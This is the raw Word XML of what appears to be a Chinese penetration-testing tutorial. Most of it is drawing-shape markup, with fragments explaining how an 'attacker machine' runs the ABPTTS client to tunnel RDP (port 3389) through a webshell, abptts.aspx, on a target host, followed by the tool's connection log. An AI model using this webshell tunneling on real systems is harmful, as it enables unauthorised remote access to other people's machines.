182,3973,15182,3972,15182,3971,15182,3970,15182,3968,15182,3967,15182,3966,15182,3965,15182,3963,15182,3962,15182,3960,15182,3959,15182,3957,15182,3956,15182,3954,15182,3952,15182,3951,15182,3949,15182,3947,15182,3946,15182,3944,15182,3942,15182,3940,15182,3938,15182,3936,15182,3934,15182,3932,15182,3930,15182,3928,15182,3925,15182,3923,15182,3921,15182,3919,15182,3916,15182,3914,15182,3911,15182,3909,15182,3906,15182,3904,15182,3901,15182,3898,15182,3895,15182,3893,15182,3890,15182,3887,15182,3884,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15180,3881,15180,3881,15180,3881,15180,3881,15180,3881,15179,3881,15179,3881,15179,3881,15178,3881,15178,3881,15178,3881,15177,3881,15177,3881,15176,3881,15176,3881,15175,3881,15175,3881,15174,3881,15173,3881,15173,3881,15172,3881,15171,3881,15170,3881,15170,3881,15169,3881,15168,3881,15167,3881,15166,3881,15165,3881,15164,3881,15163,3881,15162,3881,15160,3881,15159,3881,15158,3881,15156,3881,15155,3881,15154,3881,15152,3881,15151,3881,15149,3881,15147,3881,15146,3881,15144,3881,15142,3881,15140,3881,15138,3881,15136,3881,15134,3881,15132,3881,15130,3881,15127,3881,15125,3881,15123,3881,15120,3881,15118,3881,15115,3881,15113,3881,15110,3881,15107,3881,15104,3881,15101,3881,15098,3881,15095,3881,15092,3881,15089,3881,15085,3881,15082,3881,15078,3881,15075,3881,15071,3881,15068,3881,15064,3881,15060,3881,15056,3881,15052,3881,15048,3881,15043,3881,15039,3881,15035,3881,15030,3881,15026,3881,15021,3881,15016,3881,15011,3881,15006,3881,15001,3881,14996,3881,14991,3881,14986,3881,14980,3881,14975,3881,14969,3881,14963,3881,14957,3881,14951,3881,14945,3881,14939,3881,14933,3881,14927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:199.500pt;margin-top:745.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3990,14910" coordsize="130,270">
        <v:shape style="position:absolute;left:3990;top:14910;width:130;height:270" coordorigin="3990,14910" coordsize="130,270" path="m4001,14927l4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4002,14927,4002,14927,4002,14927,4002,14927,4002,14927,4002,14927,4002,14927,4002,14927,4002,14927,4003,14927,4003,14927,4003,14927,4003,14927,4003,14927,4004,14927,4004,14927,4004,14927,4004,14927,4005,14927,4005,14927,4005,14927,4006,14927,4006,14927,4006,14927,4007,14927,4007,14927,4008,14927,4008,14927,4008,14927,4009,14927,4009,14927,4010,14927,4010,14927,4011,14927,4012,14927,4012,14927,4013,14927,4014,14927,4014,14927,4015,14927,4016,14927,4016,14927,4017,14927,4018,14927,4019,14927,4020,14927,4021,14927,4021,14927,4022,14927,4023,14927,4024,14927,4025,14927,4027,14927,4028,14927,4029,14927,4030,14927,4031,14927,4032,14927,4034,14927,4035,14927,4036,14927,4037,14927,4039,14927,4040,14927,4042,14927,4043,14927,4045,14927,4046,14927,4048,14927,4050,14927,4051,14927,4053,14927,4055,14927,4056,14927,4058,14927,4060,14927,4062,14927,4064,14927,4066,14927,4068,14927,4070,14927,4072,14927,4074,14927,4077,14927,4079,14927,4081,14927,4083,14927,4086,14927,4088,14927,4091,14927,4093,14927,4096,14927,4098,14927,4101,14927,4104,14927,4107,14927,4109,14927,4112,14927,4115,14927,4118,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14928,4121,14928,4121,14928,4121,14928,4121,14928,4121,14929,4121,14929,4121,14929,4121,14930,4121,14930,4121,14930,4121,14931,4121,14931,4121,14931,4121,14932,4121,14932,4121,14933,4121,14934,4121,14934,4121,14935,4121,14936,4121,14936,4121,14937,4121,14938,4121,14939,4121,14939,4121,14940,4121,14941,4121,14942,4121,14943,4121,14944,4121,14945,4121,14947,4121,14948,4121,14949,4121,14950,4121,14952,4121,14953,4121,14955,4121,14956,4121,14958,4121,14959,4121,14961,4121,14963,4121,14964,4121,14966,4121,14968,4121,14970,4121,14972,4121,14974,4121,14976,4121,14978,4121,14981,4121,14983,4121,14985,4121,14988,4121,14990,4121,14993,4121,14996,4121,14998,4121,15001,4121,15004,4121,15007,4121,15010,4121,15013,4121,15016,4121,15019,4121,15023,4121,15026,4121,15030,4121,15033,4121,15037,4121,15041,4121,15044,4121,15048,4121,15052,4121,15056,4121,15060,4121,15065,4121,15069,4121,15073,4121,15078,4121,15083,4121,15087,4121,15092,4121,15097,4121,15102,4121,15107,4121,15112,4121,15117,4121,15123,4121,15128,4121,15134,4121,15139,4121,15145,4121,15151,4121,15157,4121,15163,4121,15169,4121,15175,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4120,15182,4120,15182,4120,15182,4120,15182,4120,15182,4120,15182,4120,15182,4120,15182,4119,15182,4119,15182,4119,15182,4119,15182,4119,15182,4118,15182,4118,15182,4118,15182,4117,15182,4117,15182,4117,15182,4117,15182,4116,15182,4116,15182,4115,15182,4115,15182,4115,15182,4114,15182,4114,15182,4113,15182,4113,15182,4112,15182,4112,15182,4111,15182,4110,15182,4110,15182,4109,15182,4109,15182,4108,15182,4107,15182,4106,15182,4106,15182,4105,15182,4104,15182,4103,15182,4102,15182,4102,15182,4101,15182,4100,15182,4099,15182,4098,15182,4097,15182,4096,15182,4094,15182,4093,15182,4092,15182,4091,15182,4090,15182,4089,15182,4087,15182,4086,15182,4085,15182,4083,15182,4082,15182,4080,15182,4079,15182,4077,15182,4076,15182,4074,15182,4073,15182,4071,15182,4069,15182,4067,15182,4066,15182,4064,15182,4062,15182,4060,15182,4058,15182,4056,15182,4054,15182,4052,15182,4050,15182,4048,15182,4045,15182,4043,15182,4041,15182,4039,15182,4036,15182,4034,15182,4031,15182,4029,15182,4026,15182,4024,15182,4021,15182,4018,15182,4016,15182,4013,15182,4010,15182,4007,15182,4004,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15180,4001,15180,4001,15180,4001,15180,4001,15180,4001,15179,4001,15179,4001,15179,4001,15178,4001,15178,4001,15178,4001,15177,4001,15177,4001,15176,4001,15176,4001,15175,4001,15175,4001,15174,4001,15173,4001,15173,4001,15172,4001,15171,4001,15170,4001,15170,4001,15169,4001,15168,4001,15167,4001,15166,4001,15165,4001,15164,4001,15163,4001,15162,4001,15160,4001,15159,4001,15158,4001,15156,4001,15155,4001,15154,4001,15152,4001,15151,4001,15149,4001,15147,4001,15146,4001,15144,4001,15142,4001,15140,4001,15138,4001,15136,4001,15134,4001,15132,4001,15130,4001,15127,4001,15125,4001,15123,4001,15120,4001,15118,4001,15115,4001,15113,4001,15110,4001,15107,4001,15104,4001,15101,4001,15098,4001,15095,4001,15092,4001,15089,4001,15085,4001,15082,4001,15078,4001,15075,4001,15071,4001,15068,4001,15064,4001,15060,4001,15056,4001,15052,4001,15048,4001,15043,4001,15039,4001,15035,4001,15030,4001,15026,4001,15021,4001,15016,4001,15011,4001,15006,4001,15001,4001,14996,4001,14991,4001,14986,4001,14980,4001,14975,4001,14969,4001,14963,4001,14957,4001,14951,4001,14945,4001,14939,4001,14933,4001,1492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1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攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>击机执行：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注：如果攻击机为vps，则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de3f29"/>
          <w:spacing w:val="-3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de3f29"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>需要填写vps_ip:port/目标机:port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54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python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abpttsclient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py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webshell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config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txt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"http://192.168.1.11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9/abptts.aspx"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33389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3389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6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~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ABPTTS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python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abpttsclient.py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webshell/config.txt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13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐u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"http://192.168.1.119/abptts.aspx"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e7f8f"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐f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192.168.1.5:33389/192.168.1.119:338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-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="99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25.749115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‐‐‐===[[[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Black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Path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Toward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Sun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]]]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===‐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‐‐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25.749153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‐‐==[[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Client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]]==‐‐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25.749160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Ben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Lincoln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NCC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Group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25.749169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Version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1.0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2016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07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30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263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25.750372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Listener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ready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forward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connections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fro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m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33389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3389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via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//192.168.1.119/abptt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s.as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px</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="10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25.750392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Waiting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client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connection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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="0" w:firstLine="0"/>
      </w:pP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333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89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28.560180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Client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connected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33389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28.560365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Waiting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client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connection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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="0" w:firstLine="0"/>
      </w:pP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333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89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5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28.560655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Connecting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3389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via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.119/abptts.aspx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28.868187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cookie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ASP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NET_SessionId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boyfc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epcijf43s0dhaz5of05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path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HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="144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28.868269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S2C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3389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33389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.3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8861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Connection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ID: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CEA116F4AF1FAF8C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created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connection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CEA116F4AF1FAF8C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="107" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263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29.077903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Connection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‐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level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exception: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Errno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onnection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reset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by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peer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tunnel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.3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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8861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33389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3389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736.596pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,14731">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:14731" coordorigin="10402,0" coordsize="0,14731" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,3,10402,4,10402,6,10402,8,10402,11,10402,15,10402,19,10402,23,10402,29,10402,35,10402,42,10402,50,10402,59,10402,69,10402,80,10402,93,10402,106,10402,120,10402,136,10402,153,10402,172,10402,191,10402,213,10402,236,10402,260,10402,286,10402,314,10402,343,10402,374,10402,407,10402,442,10402,479,10402,518,10402,559,10402,602,10402,647,10402,695,10402,744,10402,796,10402,850,10402,907,10402,966,10402,1028,10402,1092,10402,1159,10402,1229,10402,1301,10402,1376,10402,1454,10402,1535,10402,1618,10402,1705,10402,1795,10402,1888,10402,1984,10402,2083,10402,2185,10402,2291,10402,2400,10402,2513,10402,2629,10402,2748,10402,2871,10402,2998,10402,3128,10402,3262,10402,3400,10402,3542,10402,3688,10402,3837,10402,3991,10402,4148,10402,4310,10402,4475,10402,4645,10402,4820,10402,4998,10402,5181,10402,5368,10402,5560,10402,5756,10402,5957,10402,6162,10402,6373,10402,6587,10402,6807,10402,7031,10402,7261,10402,7495,10402,7734,10402,7978,10402,8228,10402,8482,10402,8742,10402,9007,10402,9277,10402,9552,10402,9833,10402,10120,10402,10412,10402,10709,10402,11012,10402,11321,10402,11635,10402,11956,10402,12282,10402,12614,10402,12951,10402,13295,10402,13645,10402,14001,10402,14363,10402,14731e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:650" coordorigin="1490,990" coordsize="8990,65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1000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1000l1517,1000,1517,1000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8,10484,1927,10484,1936,10484,1946,10484,1956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8,1517,1927,1517,1936,1517,1946,1517,1956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46.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2250" coordsize="8990,930">
        <v:shape style="position:absolute;left:1490;top:2250;width:8990;height:930" coordorigin="1490,2250" coordsize="8990,93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6,10484,2276,10484,2276,10484,2276,10484,2276,10484,2277,10484,2277,10484,2277,10484,2278,10484,2278,10484,2279,10484,2279,10484,2280,10484,2281,10484,2282,10484,2283,10484,2284,10484,2285,10484,2286,10484,2287,10484,2288,10484,2290,10484,2291,10484,2293,10484,2295,10484,2296,10484,2298,10484,2300,10484,2303,10484,2305,10484,2307,10484,2310,10484,2313,10484,2315,10484,2318,10484,2321,10484,2325,10484,2328,10484,2332,10484,2335,10484,2339,10484,2343,10484,2347,10484,2352,10484,2356,10484,2361,10484,2366,10484,2371,10484,2376,10484,2381,10484,2387,10484,2392,10484,2398,10484,2405,10484,2411,10484,2418,10484,2424,10484,2431,10484,2439,10484,2446,10484,2454,10484,2461,10484,2470,10484,2478,10484,2486,10484,2495,10484,2504,10484,2514,10484,2523,10484,2533,10484,2543,10484,2553,10484,2564,10484,2575,10484,2586,10484,2597,10484,2609,10484,2621,10484,2633,10484,2645,10484,2658,10484,2671,10484,2685,10484,2698,10484,2712,10484,2726,10484,2741,10484,2756,10484,2771,10484,2786,10484,2802,10484,2818,10484,2835,10484,2852,10484,2869,10484,2886,10484,2904,10484,2922,10484,2941,10484,2959,10484,2979,10484,2998,10484,3018,10484,3038,10484,3059,10484,3080,10484,3101,10484,3123,10484,3145,10484,3168,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10483,3191,10482,3191,10482,3191,10480,3191,10479,3191,10477,3191,10475,3191,10473,3191,10470,3191,10466,3191,10462,3191,10458,3191,10453,3191,10448,3191,10442,3191,10435,3191,10428,3191,10419,3191,10411,3191,10401,3191,10391,3191,10379,3191,10367,3191,10354,3191,10340,3191,10326,3191,10310,3191,10293,3191,10275,3191,10256,3191,10236,3191,10215,3191,10192,3191,10168,3191,10143,3191,10117,3191,10090,3191,10061,3191,10031,3191,9999,3191,9966,3191,9931,3191,9895,3191,9858,3191,9819,3191,9778,3191,9735,3191,9691,3191,9646,3191,9598,3191,9549,3191,9498,3191,9445,3191,9391,3191,9334,3191,9275,3191,9215,3191,9153,3191,9088,3191,9022,3191,8953,3191,8883,3191,8810,3191,8735,3191,8658,3191,8578,3191,8497,3191,8413,3191,8326,3191,8238,3191,8146,3191,8053,3191,7957,3191,7859,3191,7758,3191,7654,3191,7548,3191,7439,3191,7328,3191,7214,3191,7097,3191,6977,3191,6855,3191,6730,3191,6602,3191,6471,3191,6337,3191,6201,3191,6061,3191,5918,3191,5773,3191,5624,3191,5472,3191,5317,3191,5159,3191,4997,3191,4833,3191,4665,3191,4494,3191,4319,3191,4141,3191,3960,3191,3776,3191,3587,3191,3396,3191,3201,3191,3002,3191,2800,3191,2594,3191,2385,3191,2172,3191,1955,3191,1734,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3189,1510,3189,1510,3189,1510,3188,1510,3188,1510,3187,1510,3187,1510,3186,1510,3186,1510,3185,1510,3184,1510,3183,1510,3182,1510,3181,1510,3180,1510,3179,1510,3177,1510,3176,1510,3174,1510,3173,1510,3171,1510,3169,1510,3167,1510,3165,1510,3163,1510,3161,1510,3158,1510,3156,1510,3153,1510,3150,1510,3147,1510,3144,1510,3141,1510,3138,1510,3134,1510,3131,1510,3127,1510,3123,1510,3119,1510,3114,1510,3110,1510,3105,1510,3100,1510,3095,1510,3090,1510,3085,1510,3079,1510,3073,1510,3067,1510,3061,1510,3055,1510,3048,1510,3041,1510,3034,1510,3027,1510,3020,1510,3012,1510,3004,1510,2996,1510,2988,1510,2979,1510,2970,1510,2961,1510,2952,1510,2943,1510,2933,1510,2923,1510,2912,1510,2902,1510,2891,1510,2880,1510,2869,1510,2857,1510,2845,1510,2833,1510,2820,1510,2808,1510,2795,1510,2781,1510,2768,1510,2754,1510,2739,1510,2725,1510,2710,1510,2695,1510,2679,1510,2663,1510,2647,1510,2631,1510,2614,1510,2597,1510,2580,1510,2562,1510,2544,1510,2525,1510,2506,1510,2487,1510,2468,1510,2448,1510,2427,1510,2407,1510,2386,1510,2364,1510,2343,1510,2321,1510,2298,1510,2275e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:113.500pt;width:1.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2270" coordsize="30,910">
        <v:shape style="position:absolute;left:1490;top:2270;width:30;height:910" coordorigin="1490,2270" coordsize="30,910" path="m1517,2275l1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2276,1517,2276,1517,2276,1517,2276,1517,2276,1517,2277,1517,2277,1517,2277,1517,2278,1517,2278,1517,2279,1517,2279,1517,2280,1517,2281,1517,2282,1517,2283,1517,2284,1517,2285,1517,2286,1517,2287,1517,2288,1517,2290,1517,2291,1517,2293,1517,2295,1517,2296,1517,2298,1517,2300,1517,2303,1517,2305,1517,2307,1517,2310,1517,2313,1517,2315,1517,2318,1517,2321,1517,2325,1517,2328,1517,2332,1517,2335,1517,2339,1517,2343,1517,2347,1517,2352,1517,2356,1517,2361,1517,2366,1517,2371,1517,2376,1517,2381,1517,2387,1517,2392,1517,2398,1517,2405,1517,2411,1517,2418,1517,2424,1517,2431,1517,2439,1517,2446,1517,2454,1517,2461,1517,2470,1517,2478,1517,2486,1517,2495,1517,2504,1517,2514,1517,2523,1517,2533,1517,2543,1517,2553,1517,2564,1517,2575,1517,2586,1517,2597,1517,2609,1517,2621,1517,2633,1517,2645,1517,2658,1517,2671,1517,2685,1517,2698,1517,2712,1517,2726,1517,2741,1517,2756,1517,2771,1517,2786,1517,2802,1517,2818,1517,2835,1517,2852,1517,2869,1517,2886,1517,2904,1517,2922,1517,2941,1517,2959,1517,2979,1517,2998,1517,3018,1517,3038,1517,3059,1517,3080,1517,3101,1517,3123,1517,3145,1517,3168,1517,3191e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:158.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3170" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:3170;width:8990;height:650" coordorigin="1490,3170" coordsize="8990,650" path="m1510,3191l1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1511,3191,1512,3191,1512,3191,1514,3191,1515,3191,1517,3191,1519,3191,1521,3191,1524,3191,1528,3191,1532,3191,1536,3191,1541,3191,1546,3191,1552,3191,1559,3191,1566,3191,1575,3191,1583,3191,1593,3191,1603,3191,1615,3191,1627,3191,1640,3191,1654,3191,1668,3191,1684,3191,1701,3191,1719,3191,1738,3191,1758,3191,1780,3191,1802,3191,1826,3191,1851,3191,1877,3191,1904,3191,1933,3191,1963,3191,1995,3191,2028,3191,2063,3191,2099,3191,2136,3191,2175,3191,2216,3191,2259,3191,2303,3191,2348,3191,2396,3191,2445,3191,2496,3191,2549,3191,2604,3191,2660,3191,2719,3191,2779,3191,2841,3191,2906,3191,2972,3191,3041,3191,3112,3191,3184,3191,3259,3191,3336,3191,3416,3191,3498,3191,3582,3191,3668,3191,3757,3191,3848,3191,3941,3191,4037,3191,4136,3191,4236,3191,4340,3191,4446,3191,4555,3191,4666,3191,4780,3191,4897,3191,5017,3191,5139,3191,5264,3191,5392,3191,5523,3191,5657,3191,5793,3191,5933,3191,6076,3191,6222,3191,6370,3191,6522,3191,6677,3191,6835,3191,6997,3191,7161,3191,7329,3191,7500,3191,7675,3191,7853,3191,8034,3191,8219,3191,8407,3191,8598,3191,8793,3191,8992,3191,9194,3191,9400,3191,9609,3191,9823,3191,10039,3191,10260,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3192,10484,3192,10484,3192,10484,3192,10484,3193,10484,3193,10484,3194,10484,3194,10484,3195,10484,3195,10484,3196,10484,3196,10484,3197,10484,3198,10484,3199,10484,3200,10484,3201,10484,3202,10484,3203,10484,3204,10484,3205,10484,3207,10484,3208,10484,3210,10484,3211,10484,3213,10484,3215,10484,3216,10484,3218,10484,3220,10484,3222,10484,3225,10484,3227,10484,3229,10484,3232,10484,3235,10484,3237,10484,3240,10484,3243,10484,3246,10484,3250,10484,3253,10484,3256,10484,3260,10484,3264,10484,3267,10484,3271,10484,3276,10484,3280,10484,3284,10484,3289,10484,3293,10484,3298,10484,3303,10484,3308,10484,3313,10484,3319,10484,3324,10484,3330,10484,3336,10484,3342,10484,3348,10484,3355,10484,3361,10484,3368,10484,3375,10484,3382,10484,3389,10484,3397,10484,3404,10484,3412,10484,3420,10484,3429,10484,3437,10484,3446,10484,3454,10484,3463,10484,3472,10484,3482,10484,3491,10484,3501,10484,3511,10484,3522,10484,3532,10484,3543,10484,3554,10484,3565,10484,3576,10484,3588,10484,3599,10484,3611,10484,3624,10484,3636,10484,3649,10484,3662,10484,3675,10484,3688,10484,3702,10484,3716,10484,3730,10484,3745,10484,3759,10484,3774,10484,3790,10484,3805,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10483,3821,10482,3821,10482,3821,10480,3821,10479,3821,10477,3821,10475,3821,10473,3821,10470,3821,10466,3821,10462,3821,10458,3821,10453,3821,10448,3821,10442,3821,10435,3821,10428,3821,10419,3821,10411,3821,10401,3821,10391,3821,10379,3821,10367,3821,10354,3821,10340,3821,10326,3821,10310,3821,10293,3821,10275,3821,10256,3821,10236,3821,10215,3821,10192,3821,10168,3821,10143,3821,10117,3821,10090,3821,10061,3821,10031,3821,9999,3821,9966,3821,9931,3821,9895,3821,9858,3821,9819,3821,9778,3821,9735,3821,9691,3821,9646,3821,9598,3821,9549,3821,9498,3821,9445,3821,9391,3821,9334,3821,9275,3821,9215,3821,9153,3821,9088,3821,9022,3821,8953,3821,8883,3821,8810,3821,8735,3821,8658,3821,8578,3821,8497,3821,8413,3821,8326,3821,8238,3821,8146,3821,8053,3821,7957,3821,7859,3821,7758,3821,7654,3821,7548,3821,7439,3821,7328,3821,7214,3821,7097,3821,6977,3821,6855,3821,6730,3821,6602,3821,6471,3821,6337,3821,6201,3821,6061,3821,5918,3821,5773,3821,5624,3821,5472,3821,5317,3821,5159,3821,4997,3821,4833,3821,4665,3821,4494,3821,4319,3821,4141,3821,3960,3821,3776,3821,3587,3821,3396,3821,3201,3821,3002,3821,2800,3821,2594,3821,2385,3821,2172,3821,1955,3821,1734,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3820,1510,3820,1510,3820,1510,3820,1510,3820,1510,3819,1510,3819,1510,3819,1510,3818,1510,3818,1510,3817,1510,3817,1510,3816,1510,3816,1510,3815,1510,3814,1510,3814,1510,3813,1510,3812,1510,3811,1510,3810,1510,3809,1510,3807,1510,3806,1510,3805,1510,3803,1510,3802,1510,3800,1510,3799,1510,3797,1510,3795,1510,3793,1510,3791,1510,3789,1510,3787,1510,3785,1510,3782,1510,3780,1510,3777,1510,3774,1510,3771,1510,3768,1510,3765,1510,3762,1510,3759,1510,3755,1510,3752,1510,3748,1510,3744,1510,3740,1510,3736,1510,3732,1510,3727,1510,3723,1510,3718,1510,3713,1510,3708,1510,3703,1510,3698,1510,3693,1510,3687,1510,3681,1510,3675,1510,3669,1510,3663,1510,3657,1510,3650,1510,3643,1510,3637,1510,3629,1510,3622,1510,3615,1510,3607,1510,3599,1510,3591,1510,3583,1510,3575,1510,3566,1510,3557,1510,3548,1510,3539,1510,3530,1510,3520,1510,3510,1510,3500,1510,3490,1510,3480,1510,3469,1510,3458,1510,3447,1510,3436,1510,3424,1510,3412,1510,3400,1510,3388,1510,3375,1510,3363,1510,3350,1510,3337,1510,3323,1510,3309,1510,3295,1510,3281,1510,3267,1510,3252,1510,3237,1510,3222,1510,3206,1510,3191e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:158.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3170" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:3170;width:30;height:650" coordorigin="1490,3170" coordsize="30,650" path="m1517,3191l1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3192,1517,3192,1517,3192,1517,3192,1517,3193,1517,3193,1517,3194,1517,3194,1517,3195,1517,3195,1517,3196,1517,3196,1517,3197,1517,3198,1517,3199,1517,3200,1517,3201,1517,3202,1517,3203,1517,3204,1517,3205,1517,3207,1517,3208,1517,3210,1517,3211,1517,3213,1517,3215,1517,3216,1517,3218,1517,3220,1517,3222,1517,3225,1517,3227,1517,3229,1517,3232,1517,3235,1517,3237,1517,3240,1517,3243,1517,3246,1517,3250,1517,3253,1517,3256,1517,3260,1517,3264,1517,3267,1517,3271,1517,3276,1517,3280,1517,3284,1517,3289,1517,3293,1517,3298,1517,3303,1517,3308,1517,3313,1517,3319,1517,3324,1517,3330,1517,3336,1517,3342,1517,3348,1517,3355,1517,3361,1517,3368,1517,3375,1517,3382,1517,3389,1517,3397,1517,3404,1517,3412,1517,3420,1517,3429,1517,3437,1517,3446,1517,3454,1517,3463,1517,3472,1517,3482,1517,3491,1517,3501,1517,3511,1517,3522,1517,3532,1517,3543,1517,3554,1517,3565,1517,3576,1517,3588,1517,3599,1517,3611,1517,3624,1517,3636,1517,3649,1517,3662,1517,3675,1517,3688,1517,3702,1517,3716,1517,3730,1517,3745,1517,3759,1517,3774,1517,3790,1517,3805,1517,3821e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:190.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3810" coordsize="8990,370">
